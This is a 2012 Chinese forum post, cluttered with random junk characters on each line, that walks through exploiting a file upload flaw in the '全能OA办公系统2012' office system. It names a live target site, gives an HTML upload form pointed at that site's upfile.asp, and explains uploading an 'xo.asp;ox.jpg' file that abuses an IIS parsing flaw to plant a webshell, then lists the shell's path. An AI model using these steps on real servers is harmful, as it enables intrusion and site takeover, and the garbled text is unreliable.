全能OA办公系统 上传漏洞
( N. M/ D; a* R; g O# J" }0 r% K; |, U+ b
系统介绍:
' ^7 r6 c6 W3 j/ ~+ K3 }" p8 y: Y1 V4 o7 F0 X: l
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
; a' I. `7 ^, }
; _6 ?: G+ O$ v主要功能:
& t0 r- D" [& \5 M# L, H; D公司通告 2 B3 A& R& A, V( y/ H+ E) G
工作计划 ; c* m1 [7 T% U5 G
通讯助理
4 H9 L0 P3 @4 l; K+ r% V4 @7 e客户资源
* ^- }! l7 Q2 {, P7 _5 {" d我的公文 2 c4 E& s/ \8 K* a4 W& v$ c
公文传阅
2 D" K, J% w3 Q' N9 E公共资源
# ~7 |1 x- l9 n5 m; k资源预约
6 l2 D- ]& Q9 Z% V) g* y今日考勤
8 K2 ?" T& B, C个人计划 8 _# Z# z6 d! k
个人通讯录
7 k! Q. |5 R# J5 R# d- p" E个人基本档案
( J9 W7 h% t8 Z$ [ E. ~+ l3 r4 g未读邮件 & @4 @$ l% R" @* n" x# s8 N+ r
发邮件
+ p+ u7 h) F3 ^. d收件夹
8 r: ~+ h% v4 `寄件夹 * D: c8 _: U2 e ?
网络硬盘 3 ?1 L# R k. |) V/ t3 S/ x3 o
网络会议 # Y) j& k5 z' u/ _5 R. Q1 J
网络调查 ) L" c# S! z' d8 B5 F# z
交流论坛$ I+ `! ?8 a! @4 v
, d4 W- y+ x! W8 u n- Q1 ~3 T
有兴趣测试的朋友可以下源码看看# q: y) S0 N7 q* O
4 d( }8 m( L6 B4 W* P$ K源码下载:
7 \6 C& R1 m# d
4 [1 E: x0 ~( z' M2 Q# [5 `5 i# hhttp://www.mycodes.net/30/4750.htm
! J( C' N( d X1 B& l$ K; [) B |% L% _) |2 v
漏洞介绍:9 C; u( I6 Z% l9 C6 [
" ]7 c' F3 T: U6 r7 H- e- X }1 j由upfile.asp上传文件漏洞引起! b/ D$ c' r0 X# T4 B$ B# e! A% ^
$ c$ D: R* y- j1 U( a
测试方法:& y$ z0 `/ {( P1 n+ x1 H2 F; y
, J% K# L7 f' r2 p# i
使用名小子上传http://www.itlynn.com/upfile.asp即可5 s. l$ g% R0 ]) V6 Z
+ t3 @" V; _. x$ t
如果upfile.asp文件被删除不存在。
8 H- |! ^- O! e
+ a" X* M! {6 D' k& |0 k 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。% V) m4 R7 h# X* r
6 T y" J+ S. z
如果存在那么将如下代码保存为upfile.html。! R3 L# {8 a& I8 V; A
# M# `* [9 h, A3 e3 y
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。3 w! F& w) O* ]' u( A3 g( c
0 d" k( O* x% h% U0 p: Y) }
V1 b. y2 g; r, Y+ Z: k. ~: V% I4 g: Q/ a. Q6 o& } N( s. n
01 <table border='0' align="center" cellpadding="5">
* g8 S4 Y1 O: U
# L$ v/ o; Q* }02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
- ] U$ B* F. o' W5 i
& ^( I j: ?5 ^) @7 I03 <tr>
$ G- E+ c7 J) u
+ r- ^6 ]0 h D5 ~2 d7 U04 <td>报错:</td>
) A% }0 T% q1 k- ]: z7 d
! K2 H8 }2 {5 K7 G/ m05 <td><input type='radio' name='errnumber' value='0'> 9 ?; j* j7 t% n& D0 a: {. x2 v
6 S7 x( {( @, D, W" O% t# X0 c
06 自动更名 3 ~' B# F6 b* ^4 W. K0 b
8 q& N7 G! F& y
07 <input type='radio' name='errnumber' value='1' checked> , c3 w$ [% J) a. |
L+ M! s6 K; B
08 报错方式
5 l, g) [* J; @
7 p0 m1 l; }: |3 A6 w09 <input type='radio' name='errnumber' value='2'> 2 C6 n) }& m4 r. Y% l1 U/ i1 E
$ y3 f4 Y. h9 U& ^10 直接覆盖</td>
; v- a* s, s# ?+ ^
* d0 o+ l: {! H c6 S9 d& M! R. E7 ^11 </tr> ! {; Q1 [: |( A2 A
" p2 E: l! S! e _' l m$ A12 <tr>
; Q7 h9 t, ~+ l& P
n/ E8 F9 t( t4 u3 [7 Y13 <td>主题:</td>
+ D; [0 N# W( ?0 N# ~$ f4 L6 K3 E4 j' X9 L0 }5 U
14 <td><input type='text' name='filename' size='30'></td>
* x4 q+ \4 z5 E& ?$ H# Z5 O* W" |$ A. r& C& @
15 </tr>
6 R( p1 ]2 R$ u) b; n) ?& h* z0 z, Y' u3 c& p) Q- O2 `% Q
16 <tr> " Q! o7 u$ _, S1 U
; {6 F* }7 I7 ~4 V% X; S
17 <td>文件:</td> - R" ~9 [2 H8 v
9 K+ u* i) V. r18 <td><input type="file"name="fruit"size="30"></td> . L! ^7 y# k1 r+ X! G: g
# _3 W" }1 B5 G5 R2 S6 {. F% C/ K
19 </tr> ) L9 m7 i" I1 ~ e3 w+ Y
5 J5 f$ r( j+ ]& A, _! D
20 <tr>
o9 a) K) J" [
! }; l) }0 D7 s4 Y+ J7 n' ~5 } A3 h21 <td valign='top'>简介:</td>
/ @0 K j: \) z- l3 j
- o g) q; V: k. r22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
7 e3 o' A$ K O( Z( x1 {: F7 Z! C+ }8 ]; Q# Y$ e1 Y: S+ ?
23 </tr> : _: A2 C% _+ I8 x: B' Z/ o) R
+ e9 y# M; Q0 q: S- ]) a0 \
24
7 ]1 X2 O; F; w1 B7 }
8 c# B. `7 Z: u% R) h% p25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ) n9 k- d! x6 W$ G
- T# t: D' j* w" d1 ^! c% E4 T# n# }8 ]26 </tr>
, Z4 i" P! Q* d6 q
! R7 J3 H L4 c! M+ Q8 G. b. B# J27 </form>
& K ^! N% {. c. P5 E
+ V' J0 L. k# Q) z3 p, k8 s) |, [$ [, R' p然后打开上传一个文件名为xo.asp;ox.jpg的文件。, u3 f' X/ |& p. D+ Z
1 q. b; a! O# R/ v, H; F P9 Y
2 Z7 z3 N' O' |: I- z6 w* H) l; X! B. D
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
' k; y* r. e0 @$ H x# J8 S# F- v
" N6 V) V4 k7 z7 u' F3 F- D9 \; @此漏洞需要配合解析漏洞利用。- z: H* I- P7 ]$ [( V
" K0 @+ U3 E& j9 w% g H |
发表于 2012-11-21 13:45:12
收藏
支持
反对